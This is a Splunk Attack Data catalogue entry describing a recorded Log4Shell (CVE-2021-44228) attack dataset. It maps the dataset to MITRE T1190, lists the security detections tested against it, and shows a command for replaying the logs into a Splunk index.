Java

Date: 2021-12-13 ID: cc9b266c-23c9-11eb-926b-220bf0943fbb Author: Michael Haag, Splunk Environment: attack_range Directory: java

Description

Attack data related to Log4Shell CVE-2021-44228

ID	Technique	Tactic
T1190	Exploit Public-Facing Application	Initial Access

The following datasets were collected during this attack simulation:

The following detections in our security content repository use this attack data for testing:

Detection Name	Type	Source	MITRE ATT&CK	Analytic Story
Web or Application Server Spawning a Shell	`TTP`	Endpoint	T1190, T1133	BlackByte Ransomware, CISA AA22-257A, CISA AA22-264A, Cleo File Transfer Software, Data Destruction, Flax Typhoon, GhostRedirector IIS Module and Rungan Backdoor, HAFNIUM Group, Hermetic Wiper, Log4Shell CVE-2021-44228, Microsoft SharePoint Vulnerabilities, Microsoft WSUS CVE-2025-59287, PHP-CGI RCE Attack on Japanese Organizations, ProxyNotShell, ProxyShell, SAP NetWeaver Exploitation, Spring4Shell CVE-2022-22965, SysAid On-Prem Software CVE-2023-47246 Vulnerability, WS FTP Server Critical Vulnerabilities
Linux Java Spawning Shell	`TTP`	Deprecated	T1190, T1133	Data Destruction, Spring4Shell CVE-2022-22965, Hermetic Wiper, Log4Shell CVE-2021-44228
Hunting for Log4Shell	`Hunting`	Web	T1190, T1133	Log4Shell CVE-2021-44228, CISA AA22-320A
Java Class File download by Java User Agent	`TTP`	Web	T1190	Log4Shell CVE-2021-44228
Confluence Unauthenticated Remote Code Execution CVE-2022-26134	`TTP`	Web	T1505, T1190, T1133	Atlassian Confluence Server and Data Center CVE-2022-26134, Confluence Data Center and Confluence Server Vulnerabilities

Replay attack data with replay.py from Splunk Attack Data.

1python replay.py --dataset /datasets/attack_techniques/T1190/java/log4shell-nginx.log --index attack_data

Find more detections and analytics for this attack technique in our security content repository.

Source: GitHub | Version: 1.0